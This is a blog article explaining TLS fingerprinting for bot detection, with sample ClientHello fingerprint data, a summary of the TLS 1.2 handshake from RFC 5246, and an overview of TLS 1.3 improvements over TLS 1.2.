<p>For instance, correlating TLS handshake data with the advertised HTTP User-Agent gives us information to <strong>detect malicious bots</strong>. For example, many advanced bots use Linux operating systems but claim to be macOS or Windows devices in the HTTP User-Agent. If there is a mismatch in the TLS fingerprint induced OS and the User-Agent advertised OS, this could be a sign that the client lies about its configuration.</p>
<h2>Fingerprinting TLS - A new Tool</h2>
<p>In this section, I present a simple tool that extracts properties / entropy from the TLS handshake and forms a TLS fingerprint. Such a TLS fingerprint may be used to identify devices / TLS implementations. This tool will be able to collect statistical data and correlate the entropy with the <code>User-Agent</code> transmitted in HTTP headers. After this data collection process, I can answer questions such as:</p>
<ol>
<li>Does this TLS fingerprint belong to the operating system that is claimed by the User Agent?</li>
<li>How unique is the TLS fingerprint of the client in question?</li>
<li>Based on past observations and collected TLS client data, is this fingerprint a legit one?</li>
<li>To what TLS implementation does this fingerprint belong?</li>
</ol>
<p><strong>Live TLS Entropy Detection:</strong> This is your last seen TLS handshake data - Taken from the initial Client Hello handshake message:</p>
<pre style="overflow: auto;" id="tls_fp">
...loading (JavaScript required)
</pre>
<script>
fetch('https://tls.incolumitas.com/fps')
.then(response => response.json())
.then(function(data) {
document.getElementById('tls_fp').innerText = JSON.stringify(data, null, 2);
})
</script>
<p>Your User-Agent (<code>navigator.userAgent</code>) says that you are </p>
<pre style="overflow: auto;" id="userAgent">
</pre>
<script>
document.getElementById('userAgent').innerText = navigator.userAgent;
</script>
<h2>TLS Fingerprint Definition</h2>
<p>What fields/data from the TLS handshake constitutes the TLS fingerprint? Put differently: What sources of entropy do I use to build the TLS fingerprint?</p>
<p>Currently, I use the following data sources from the initial client <code>ClientHello</code> TLS handshake message:</p>
<ul>
<li><strong>TLS Cipher Suites</strong> - The preference-ordered list of <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-4">supported cipher suites</a> of the client. (Example: <code>"19018,4865,4866,4867,49195,49199,49196,49200,52393,52392,49171,49172,156,157,47,53"</code>)</li>
<li><strong>Client Hello Version</strong> - The supported TLS version (Example: <code>"TLS 1.2"</code>)</li>
<li><strong>EC Point Formats</strong> - The <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-9">EC point formats</a> the client supports (Example: <code>"0,1,2"</code>)</li>
<li><strong>Extensions</strong> - The list of <a href="https://www.iana.org/assignments/tls-extensiontype-values/tls-extensiontype-values.xhtml#tls-extensiontype-values-1">supported extensions</a> (Example: <code>"56026,0,23,65281,10,11,35,16,5,13,18,51,45,43,27,17513,31354"</code>)</li>
<li><strong>Record Version</strong> - The TLS record version, which is mostly <code>1.0</code> (Example: <code>"TLS 1.0"</code>)</li>
<li><strong>Signature Algorithms</strong> - The list of supported client <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-16">signature algorithms</a> (Example: <code>"1027,2052,1025,1283,2053,1281,2054,1537"</code>)</li>
<li><strong>Supported Groups</strong> - The list of the <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-8">supported groups</a> of the client (Example: <code>"56026,29,23,24"</code>)</li>
</ul>
<p>Some TLS clients will randomize some TLS parameters for each new handshake. This is a small problem, but not substantial. For example, my own laptop/browser sends the following <code>ClientHello</code> and a slightly different in the next <code>ClientHello</code>:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"num_fingerprints"</span><span class="p">:</span><span class="w"> </span><span class="mi">10</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"sha3_384"</span><span class="p">:</span><span class="w"> </span><span class="s2">"a14851b3e6b9daa564f285c983ab929318875eeac94c56d02268bfb00ca37427e7d7d677140284f7aa4da36e0a8979de"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"timestamp"</span><span class="p">:</span><span class="w"> </span><span class="mf">1643713939.2002213</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tls_fp"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ciphers"</span><span class="p">:</span><span class="w"> </span><span class="s2">"31354,4865,4866,4867,49195,49199,49196,49200,52393,52392,49171,49172,156,157,47,53"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"client_hello_version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TLS 1.2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ec_point_formats"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"extensions"</span><span class="p">:</span><span class="w"> </span><span class="s2">"14906,0,23,65281,10,11,35,16,5,13,18,51,45,43,27,17513,10794"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"record_version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TLS 1.0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"signature_algorithms"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1027,2052,1025,1283,2053,1281,2054,1537"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"supported_groups"</span><span class="p">:</span><span class="w"> </span><span class="s2">"47802,29,23,24"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="nt">"user-agent"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>As you can observe, the first element of <code>ciphers</code>, <code>extensions</code> and <code>supported_groups</code> seems to be chosen at random, which results in a different <code>sha3_384</code> fingerprint.</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"num_fingerprints"</span><span class="p">:</span><span class="w"> </span><span class="mi">12</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"sha3_384"</span><span class="p">:</span><span class="w"> </span><span class="s2">"f18a2ee62ee0548fb09c5a31d4bbc61845cc53055c1640e381201d779a80a94e0d870fd48c2fc39fb5b15715ea731d95"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"timestamp"</span><span class="p">:</span><span class="w"> </span><span class="mf">1643713950.4840238</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tls_fp"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ciphers"</span><span class="p">:</span><span class="w"> </span><span class="s2">"14906,4865,4866,4867,49195,49199,49196,49200,52393,52392,49171,49172,156,157,47,53"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"client_hello_version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TLS 1.2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ec_point_formats"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"extensions"</span><span class="p">:</span><span class="w"> </span><span class="s2">"64250,0,23,65281,10,11,35,16,5,13,18,51,45,43,27,17513,60138,21"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"record_version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TLS 1.0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"signature_algorithms"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1027,2052,1025,1283,2053,1281,2054,1537"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"supported_groups"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35466,29,23,24"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="nt">"user-agent"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p><strong>Solution:</strong> I will only consider non-Reserved and non-Unassigned values for <code>ciphers</code>, <code>extensions</code> and <code>supported_groups</code> in the TLS fingerprint.</p>
<h2>Recommended Reading List</h2>
<p>So you want to start fingerprinting TLS connections? It's plenty of fun. For me, the following reading list was very helpful:</p>
<ol>
<li><a href="https://resources.sei.cmu.edu/asset_files/Presentation/2019_017_001_539902.pdf">Slides - The Generation and Use of TLS Fingerprints</a> - Cisco is doing advanced TLS fingerprinting and they <a href="https://github.com/cisco/joy">open sourced</a> some of their TLS fingerprinting methodology and fingerprint database. They are also talking in a blog article named <a href="https://blogs.cisco.com/security/tls-fingerprinting-in-the-real-world">TLS Fingerprinting in the Real World
</a> about the subject.</li>
<li>A rather new paper by researchers from the Technical University of Munich named <a href="https://www.net.in.tum.de/fileadmin/TUM/NET/NET-2020-04-1/NET-2020-04-1_04.pdf">TLS Fingerprinting Techniques</a> is also a highly suggested read about TLS fingerprinting.</li>
<li>Another great read is a blog article named <a href="https://engineering.salesforce.com/tls-fingerprinting-with-ja3-and-ja3s-247362855967">TLS Fingerprinting with JA3 and JA3S from Salesforce</a> which explains in-depth how Salesforce's JA3 and JA3S TLS fingerprinting works. The code for <a href="https://github.com/salesforce/ja3">JA3 and JA3S is open sourced</a>.</li>
</ol>
<h2>Introduction</h2>
<p>TLS stands for <em>Transport Layer Security</em> and is the successor of the deprecated Secure Sockets Layer (SSL) protocol. TLS is a client / server protocol that allows connections to be cryptographically <em>secure</em>.</p>
<p>TLS and SSL are application layer protocols, which means that they are situated above the Transport Layer (such as TCP and UDP) and of course also above the Network Layer (with IPv4 and Ipv6 being the most prominent protocols in the Network Layer). This means that a TLS connection establishment occurs after the TCP/IP handshake and before messages exchanges from protocols such as FTP or HTTP. </p>
<p>Nevertheless, TLS is a protocol on the same application layer level as the protocols FTP or HTTP. This is often confusing, since we often speak of SFTP (Secure FTP) and HTTPS (Hypertext Transfer Protocol Secure). Are those completely new protocols then? Yes and no! HTTPS is the same as HTTP, but the protocol is encapsulated by a secure channel that is established by TLS.</p>
<p><a href="https://en.wikipedia.org/wiki/Transport_Layer_Security#Description">The TLS Wikipedia Article</a> explains this in a very good way:</p>
<blockquote>
<p>TLS and SSL do not fit neatly into any single layer of the OSI model or the TCP/IP model. TLS runs "on top of some reliable transport protocol (such as TCP), which would imply that it is above the transport layer. It serves encryption to higher layers, which is normally the function of the presentation layer. However, applications generally use TLS as if it were a transport layer, even though applications using TLS must actively control initiating TLS handshakes and handling of exchanged authentication certificates.</p>
</blockquote>
<p>TLS is a Internet Engineering Task Force (IETF) standard and was first defined in 1999. Nowadays, the most relevant TLS versions are TLS 1.2 and TLS 1.3, both are defined in seperate RFCs:</p>
<ol>
<li>TLS 1.2 is defined in <a href="https://datatracker.ietf.org/doc/html/rfc5246">RFC 5246</a> and dates back to August 2008.</li>
<li>TLS 1.3 was released 10 years later in August 2018. TLS 1.3 is defined in <a href="https://datatracker.ietf.org/doc/html/rfc8446">RFC 8446</a> and is the latest major TLS release.</li>
</ol>
<p>But what security properties does the TLS protocol offer exactly?</p>
<ul>
<li>
<p>A TLS connection is secure / confidential because every transmitted byte is encrypted by a symmetric cryptographical algorithm. The symmetric key is generated freshly for each new protocol instance, which gives us <em>forward secrecy</em>. Put differently, with the help of the Diffie-Hellman key exchange, a common secret is derived between client and server.</p>
</li>
<li>
<p>The identity of the server can be authenticated with public-key cryptography. The client can verify the authenticity of the server by verifying the server certificate. Whereas authentication for the server is mandatory, it is optional for the client.</p>
</li>
<li>
<p>A TLS connection is reliable, since each message is protected by a message authentication code (MAC), which prevents undetected loss and modification of data in transmission (For example by a man-in-the-middle attacker).</p>
</li>
</ul>
<h1>TLS 1.2 - An RFC 5246 Summary</h1>
<p>In the following sections, I will summarize the most important aspects of <a href="https://datatracker.ietf.org/doc/html/rfc5246">RFC 5246</a>. Some text sessions are direct quotes from <a href="https://datatracker.ietf.org/doc/html/rfc5246">RFC 5246</a>. Most of it is summarized and extended.</p>
<p>The RFC states that TLS is a protocol that provides privacy and data integrity between two communication partners. The TSL protocol is composed of two layers:</p>
<ol>
<li>the TLS Record Protocol and </li>
<li>the TLS Handshake Protocol.</li>
</ol>
<p>The TLS Record Protocol provides connection security with two basic properties:</p>
<ol>
<li>The connection is private. This is done with symmetric data encryption. The symmetric key is negociated with the TLS Handshake Protocol.</li>
<li>The connection is reliable. The messages integrity is protected with a keyed MAC.</li>
</ol>
<p>The TLS Record Protocol is the underlying protocol of every TLS message, also the messages of the TLS Handshaking Protocol.</p>
<p>The TLS Handshake Protocol provides connection security that has three basic properties:</p>
<ol>
<li>
<p><strong>Authenticaton</strong>: The peer's identity can be authenticated using asymmetric, or
public key, cryptography. This authentication is optional, but is usually required for
the TLS server.</p>
</li>
<li>
<p><strong>Man-in-the-middle resistance</strong>: The negotiation of a shared secret is secure and unavailable to eavesdroppers.
The secret cannot be obtained by an man-in-the-middle attacker.</p>
</li>
<li>
<p><strong>Integrity</strong> :The negotiation is reliable: no attacker can modify the
negotiation communication without being detected.</p>
</li>
</ol>
<p>One advantage of TLS is that it is application protocol independent.
Higher-level protocols can layer on top of the TLS protocol transparently.</p>
<h2>The TLS 1.2 Record Protocol</h2>
<p>The TLS Record Protocol is a layered protocol.</p>
<p><a href="https://datatracker.ietf.org/doc/html/rfc5246">RFC 5246</a> states:</p>
<blockquote>
<p>At each layer, messages may include fields for length, description, and content.
The Record Protocol takes messages to be transmitted, fragments the
data into manageable blocks, optionally compresses the data, applies
a MAC, encrypts, and transmits the result. Received data is
decrypted, verified, decompressed, reassembled, and then delivered to
higher-level clients.</p>
</blockquote>
<p>TLS 1.2 makes use of four protocols that are described in this
document: The handshake protocol, the alert protocol, the change
cipher spec protocol, and the application data protocol.</p>
<p>TLS has three subprotocols:</p>
<ol>
<li>A subprotocol that is used to allow peers to agree upon
security parameters for the record layer</li>
<li>One to authenticate themselves</li>
<li>And one to instantiate negotiated security parameters, and to report error
conditions to each other.</li>
</ol>
<p>The Handshake Protocol is responsible for negotiating a session,
which consists of the following items:</p>
<ol>
<li><strong>session identifier</strong> - An arbitrary byte sequence chosen by the server to identify an
active or resumable session</li>
<li><strong>peer certificate</strong> - X509v3 certificate of the peer.</li>
<li><strong>compression method</strong> - The algorithm used to compress data prior to encryption.</li>
<li><strong>cipher spec</strong> - Specifies the pseudorandom function (PRF) used to generate keying
material, the bulk data encryption algorithm (such as null, AES,
etc.) and the MAC algorithm (such as HMAC-SHA1).</li>
<li><strong>master secret</strong> - 48-byte secret shared between the client and server.</li>
<li><strong>is resumable</strong> - A flag indicating whether the session can be used to initiate new
connections.</li>
</ol>
<p>These items are then used to create security parameters for use by
the record layer when protecting raw application data. Connections
can be reused using the same session through the resumption
feature.</p>
<p>Then there is the <strong>Change Cipher Spec Protocol</strong> message: This message is sent by both the client and the
server to notify the other party that subsequent records will be
protected under the newly negotiated ciphers and keys.</p>
<p>The <strong>Alert Protocol</strong> messages convey the severity of the message
(warning or fatal) and a description of the alert. Alert messages
with a level of fatal result in the immediate termination of the
connection.</p>
<h2>TLS 1.2 Handshake Protocol Overview</h2>
<p>The cryptographic parameters for each TLS session are produced by the
TLS Handshake Protocol, which operates on top of the TLS record
layer. When a TLS client and server start a new protocol iteration, they do the following:</p>
<ol>
<li>Client and server agree on a protocol version</li>
<li>They select cryptographic algorithms</li>
<li>They optionally authenticate each other</li>
<li>And they use public-key encryption techniques to generate shared secrets</li>
</ol>
<p>The TLS Handshake Protocol consists of the following steps:</p>
<p>In a first step, client and server exchange hello messages to agree on algorithms, exchange random
values, and check for session resumption.</p>
<p>Then they exchange the necessary cryptographic parameters to allow the client and server to agree on a premaster secret.</p>
<p>After that, they exchange certificates and cryptographic information to allow the client and server to authenticate themselves. In practice, only the server is authenticated.</p>
<p>Both generate a master secret from the premaster secret and exchanged random values.</p>
<p>Client and server provide security parameters to the record layer.</p>
<p>Finally, the protocol allows the client and server to verify that their peer has calculated the same security parameters and that the handshake occurred without tampering.</p>
<p>This is how the full TLS handshake occurs in more detail:</p>
<p>The client sends a <code>ClientHello</code> message to
which the server must respond with a <code>ServerHello</code> message (else a
fatal error will occur and the connection will terminate). The <code>ClientHello</code> and
<code>ServerHello</code> establish the following attributes: Protocol Version,
Session ID, Cipher Suite, and Compression Method. Additionally, two
random values are generated and exchanged: <code>ClientHello.random</code> and
<code>ServerHello.random</code>.</p>
<p>The actual key exchange uses up to four messages: the server
Certificate, the <code>ServerKeyExchange</code>, the client Certificate, and the
<code>ClientKeyExchange</code>.</p>
<p>Following the hello messages, the server will send its certificate in
a Certificate message if it is to be authenticated. Additionally, a
<code>ServerKeyExchange</code> message may be sent, if it is required, for example if
the server has no certificate, or if its certificate is for signing
only. If the server is authenticated, it may request a certificate
from the client.</p>
<p>Next, the server will send the <code>ServerHelloDone</code> message, indicating
that the hello-message phase of the handshake is complete. The
server will then wait for a client response. If the server has sent
a <code>CertificateRequest</code> message, the client MUST send the Certificate
message. The <code>ClientKeyExchange</code> message is now sent, and the content
of that message will depend on the public key algorithm selected
between the <code>ClientHello</code> and the <code>ServerHello</code>. If the client has sent
a certificate with signing ability, a digitally-signed
CertificateVerify message is sent to explicitly verify possession of
the private key in the certificate.</p>
<p>At this point, a <code>ChangeCipherSpec</code> message is sent by the client, and
the client copies the pending Cipher Spec into the current Cipher
Spec. The client then immediately sends the Finished message under
the new algorithms, keys, and secrets. In response, the server will
send its own <code>ChangeCipherSpec</code> message, transfer the pending to the
current Cipher Spec, and send its Finished message under the new
Cipher Spec. At this point, the handshake is complete, and the
client and server may begin to exchange application layer data.
Application data is not allowed to be sent prior to the
completion of the first handshake (before a cipher suite other than
TLS_NULL_WITH_NULL_NULL is established).</p>
<p>This is the full TLS Handshake Protocol Overview (* Indicates optional or situation-dependent messages):</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="n">Client</span><span class="w"> </span><span class="n">Server</span><span class="w"></span>
<span class="w"> </span><span class="n">ClientHello</span><span class="w"> </span><span class="o">--------></span><span class="w"></span>
<span class="w"> </span><span class="n">ServerHello</span><span class="w"></span>
<span class="w"> </span><span class="n">Certificate</span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="n">ServerKeyExchange</span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="n">CertificateRequest</span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="o"><--------</span><span class="w"> </span><span class="n">ServerHelloDone</span><span class="w"></span>
<span class="w"> </span><span class="n">Certificate</span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="n">ClientKeyExchange</span><span class="w"></span>
<span class="w"> </span><span class="n">CertificateVerify</span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">ChangeCipherSpec</span><span class="o">]</span><span class="w"></span>
<span class="w"> </span><span class="n">Finished</span><span class="w"> </span><span class="o">--------></span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">ChangeCipherSpec</span><span class="o">]</span><span class="w"></span>
<span class="w"> </span><span class="o"><--------</span><span class="w"> </span><span class="n">Finished</span><span class="w"></span>
<span class="w"> </span><span class="n">Application</span><span class="w"> </span><span class="k">Data</span><span class="w"> </span><span class="o"><</span><span class="c1">-------> Application Data</span>
</code></pre></div>
<p>When the client and server decide to resume a previous session, the message flow is as follows:</p>
<p>The client sends a ClientHello using the Session ID of the session to
be resumed. The server then checks its session cache for a match.
If a match is found, and the server is willing to re-establish the
connection under the specified session state, it will send a
<code>ServerHello</code> with the same Session ID value. At this point, both
client and server MUST send <code>ChangeCipherSpec</code> messages and proceed
directly to Finished messages. Once the re-establishment is
complete, the client and server can exchange application
layer data. If a Session ID match is not
found, the TLS client and server perform a full handshake.</p>
<p>Session resumption, abbreviated handshake:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="n">Client</span><span class="w"> </span><span class="n">Server</span><span class="w"></span>
<span class="w"> </span><span class="n">ClientHello</span><span class="w"> </span><span class="o">--------></span><span class="w"></span>
<span class="w"> </span><span class="n">ServerHello</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">ChangeCipherSpec</span><span class="o">]</span><span class="w"></span>
<span class="w"> </span><span class="o"><--------</span><span class="w"> </span><span class="n">Finished</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">ChangeCipherSpec</span><span class="o">]</span><span class="w"></span>
<span class="w"> </span><span class="n">Finished</span><span class="w"> </span><span class="o">--------></span><span class="w"></span>
<span class="w"> </span><span class="n">Application</span><span class="w"> </span><span class="k">Data</span><span class="w"> </span><span class="o"><</span><span class="c1">-------> Application Data</span>
</code></pre></div>
<h1>Core Improvements of TLS 1.3 compared to TLS 1.2</h1>
<p>Excellent articles on the most important differences between TLS 1.2 and TLS 1.3 can be found in</p>
<ul>
<li>
<p>an article from 2018 from Cloudflare Inc. named <a href="https://blog.cloudflare.com/rfc-8446-aka-tls-1-3/">A Detailed Look at RFC 8446 (a.k.a. TLS 1.3)</a>, which is an excellent read on that topic</p>
</li>
<li>
<p>and another great article from thesslstore.com named <a href="https://www.thesslstore.com/blog/tls-1-3-everything-possibly-needed-know/">TLS 1.2 vs. TLS 1.3 – What’s the difference?</a></p>
</li>
</ul>
<p>This section is heavily based on those two articles.</p>
<figure>
<img src="https://incolumitas.com/images/tls-comp.png" alt="TLS 1.2 vs TLS 1.3" />
<figcaption>Visual comparison of TLS 1.2 and TLS 1.3 (<a href="https://www.embeddedcomputing.com/technology/security/advantages-to-using-tls-1-3-faster-more-efficient-more-secure">Image source</a>)</figcaption>
</figure>
<p>The core improvements from TLS 1.3 over its predecessor TLS 1.2 are:</p>
<ul>
<li><em>Removal of legacy ciphers:</em> TLS 1.3 eliminates support for outmoded algorithms and ciphers</li>
<li><em>RSA removed:</em> TLS 1.3 eliminates RSA key exchange, mandates Perfect Forward Secrecy</li>
<li><em>Reduced handshake complexity:</em> Reduces the number of negotiations in the handshake</li>
<li><em>Less ciphers:</em> Reduces the number of algorithms in a cipher suite to only 2</li>
<li><em>No more block ciphers:</em> TLS 1.3 eliminates block mode ciphers and mandates AEAD bulk encryption</li>
<li>TLS 1.3 uses HKDF cryptographic extraction and key derivation</li>
<li><em>Reduced RTTs:</em> TLS 1.3 offers 1-RTT mode and Zero Round Trip Resumption</li>
<li><em>More secure:</em> TLS 1.3 signs the entire handshake, an improvement of TLS 1.2</li>
<li><em>More curves:</em> TLS 1.3 supports additional elliptic curves</li>
</ul>
<p><strong>TLS 1.2 is slow:</strong> TLS 1.2 remained unchanged since TLS was first standardized in 1999, which means that it still requires two additional round-trips between client and server before the connection is encrypted. This is one reason why a new TLS version was in the planning.</p>
<p><strong>Design goals for TLS 1.3:</strong> There were several underlying design goals that drove the development of TLS 1.3 in an open process:</p>
<ul>
<li>Reducing the number of TLS handshake RTTs</li>
<li>Encrypting the whole TLS handshake instead of the partial handshake as in TLS 1.2</li>
<li>Increase the resilience against cross-protocol attacks</li>
<li>Removing legacy features, especially legacy ciphers</li>
</ul>
<p>The two main advantages from TLS 1.3 on TLS 1.2 are increased performance and improved security.</p>
<p><strong>Deprecation of the RSA key exchange in TLS 1.3:</strong> In the RSA key exchange, the shared secret is decided by the client. The client encrypts the chosen secret with the server's public key (obtained from the server certificate) and sends it to the server. The RSA key exchange has an important downside: It is not forward secret because it doesn’t offer an ephemeral key mode.</p>
<p>Forward secrecy is the property that prevents attackers from decrypting traffic that was recorded in the past, if they manage to get hold of the RSA private key from the server.</p>
<p>Put differently: If an attacker finds out the RSA private key of the server, they can decrypt all past and future traffic between the client and server. Obtaining the server RSA private key was possible through the <a href="https://heartbleed.com/">Heartbleed vulnerability</a>, therefore it is not an hypothetical example. RSA usage is dangerous!</p>
<p>Another reason for the deprecation of RSA is the difficulty of implementing RSA encryption properly, as the infamous <a href="https://en.wikipedia.org/wiki/Daniel_Bleichenbacher">Bleichenbacher attacks</a> (<em>million-message attacks</em>) against RSA have shown. Those attacks are also known under the name <a href="https://www.thesslstore.com/blog/bleichenbachers-cat-rsa-key-exchange/">Oracle padding attacks</a>.</p>
<p>For that reason, TLS 1.3 only supports the ephemeral Diffie-Hellman key exchange, where the client and server generate new public/private key pairs for each instance of the TLS handshake. Then they establish a shared secret by combining their respective public key parts. Because a new key pair is generated for each instance, the handshake is ephemeral and is forward secret. </p>
<p>Another advantage of deprecating RSA as key exchange option: Client and server may only use the ephemeral Diffie-Hellman key exchange, so the client can save one RTT by sending the requisite randoms and inputs needed for key generation directly, without having to agree with the server whether RSA or DH should be used.</p>
<p>This leads to...</p>
<p><strong>1-RTT handshake:</strong> Due to the simpler cipher negotiation model and reduced set of key agreement options (no RSA, no user defined DH parameters), the parameters supported by the server are easier to guess (ECDHE with X25519 or P-256 for example). This allows the client to simply send DH key shares in the first message instead of waiting until the server has confirmed which key shares it supports. </p>
<p>This leads to a one RTT handshake that looks like the following:</p>
<figure>
<img src="https://incolumitas.com/images/Single-Round-Trip-Handshake-1.png" alt="TLS 1.3 simplified handshake" />
<figcaption>The TLS 1.3 simplified handshake (<a href="https://www.thesslstore.com/blog/tls-1-3-everything-possibly-needed-know/">Image taken from the www.thesslstore.com blog</a>)</figcaption>
</figure>
<p><strong>0-RTT handshake resumption:</strong> With TLS 1.3, clients can send encrypted data in the first message. In TLS 1.2, there are two different ways to resume a connection:</p>
<ol>
<li>session ids </li>
<li>session tickets</li>
</ol>
<p>In TLS 1.3, there is a new session-resumption mode called PSK resumption, which allows for almost-instantaneous session resumption for visitors that have recently connected to your TLS server.</p>
<p>In this mode, the client and server derive a shared secret called the "resumption main secret" which is stored on the server. The session ticket is sent to the client and used when a new TLS session is created.</p>
<p>The next time the client connects to the server, it can take the secret from the previous session and use it to encrypt application data that is sent to the server (alongside sending the session ticket). The server validates the session ticket and the session resumes.</p>
<p><strong>TLS 1.3 reduces choice in cryptographic schemes:</strong> TLS 1.3 reduces Diffie-Hellman parameters to ones that are known to be secure. Furthermore, TLS 1.3 also reduces heavily the choice of symmetric ciphers used for decryption and their mode of operation. In fact, TLS 1.3 removed all CBC-mode ciphers or insecure stream ciphers such as RC4. The only symmetric crypto that is still allowed in TLS 1.3 are AEAD (authenticated encryption with additional data) ciphers, which means that encryption and integrity occur in one and the same operation.</p>
<p>Among others, TLS 1.3 mandated the removal of the following TLS 1.2 ciphers:</p>
<ul>
<li>RC4 Stream Cipher</li>
<li>RSA Key Exchange</li>
<li>SHA-1 Hash Function</li>
<li>CBC (Block) Mode Ciphers</li>
<li>MD5 Algorithm</li>
<li>Various non-ephemeral Diffie-Hellman groups</li>
<li>EXPORT-strength ciphers</li>
<li>DES</li>
<li>3DES</li>
</ul>
<p><strong>Removing PKCS#1 v1.5 padding:</strong> As discussed above, <a href="https://en.wikipedia.org/wiki/Daniel_Bleichenbacher">Bleichenbacher attacks</a> worked against RSA signatures used in TLS 1.2, with the underlying difficulty of implementing RSA padding correctly. In TLS 1.3, the newer design RSA-PSS obsoleted PKCS#1 v1.5 padding.</p>
<p><strong>Signing the whole handshake:</strong> The TLS server uses a digital signature to prove that they key exchange was not tampered. In TLS 1.2, the server signature only covers part of the handshake, especially not the part where the server negotiates which symmetric cipher should be used. This lead to a number of vulnerabilities such as FREAK and LogJam, where a man-in-the-middle attacker can downgrade the chosen ciphers to pick intentionally weak ciphers (export ciphers). In TLS 1.3, the server signs the entire handshake transcript.</p>
<figure>
<img src="https://incolumitas.com/images/FREAK.png" alt="TLS 1.2 vs FREAK" />
<figcaption>The TLS FREAK downgrade attack (<a href="https://blog.cloudflare.com/rfc-8446-aka-tls-1-3/">Image taken from the Cloudflare blog</a>)</figcaption>
</figure>
<p><strong>General protocol simplification:</strong> In previous TLS protocols, the entire ciphersuite was negotiated including many crypto attributes:</p>
<ul>
<li>certificate types that are supported</li>
<li>hash function used (SHA1, SHA256, ...)</li>
<li>MAC function (HMAC with SHA1, SHA256, ...)</li>
<li>key exchange algorithm (RSA, ECDHE, ...)</li>
<li>cipher (e.g., AES, RC4, ...) and cipher mode, if applicable (e.g., CBC)</li>
</ul>
<p>This lead to a combinational explosion of crypto ciphe code points that had to be maintained by the Internet Assigned Numbers Authority (IANA). There is the <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-4">IANA page</a> that hosts a <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters-4.csv">CSV file</a> that includes all the ciphers currently used in TLS 1.2. It's a huge file!</p>
<p>TLS 1.3 on the other hand only allows peers to negotiate:</p>
<ul>
<li>Cipher + HKDF Hash</li>
<li>Key Exchange</li>
<li>Signature Algorithm</li>
</ul>
<p>As discussed above, this has the side effect that the handshake only needs one RTT instead of two RTTs.</p>
<p><strong>Simplified Cipher Suites:</strong> </p>
<p>Due to this massive elimination of cipher suites in TLS 1.3, the size of possible cipher suites went down.</p>
<p>A TLS 1.2 cipher had the following format:</p>
<figure>
<img src="https://incolumitas.com/images/TLS-1.2-Cipher-Suite.png" alt="TLS 1.2 ciphersuite" />
<figcaption>TLS 1.2 ciphersuite (<a href="https://www.thesslstore.com/blog/tls-1-3-everything-possibly-needed-know/">Image taken from the www.thesslstore.com blog</a>)</figcaption>
</figure>
<p>And this is how a TLS 1.3 ciphersuite looks. Much easier, right?!</p>
<figure>
<img src="https://incolumitas.com/images/TLS-1.3-cipher-suite.png" alt="TLS 1.3 ciphersuite" />
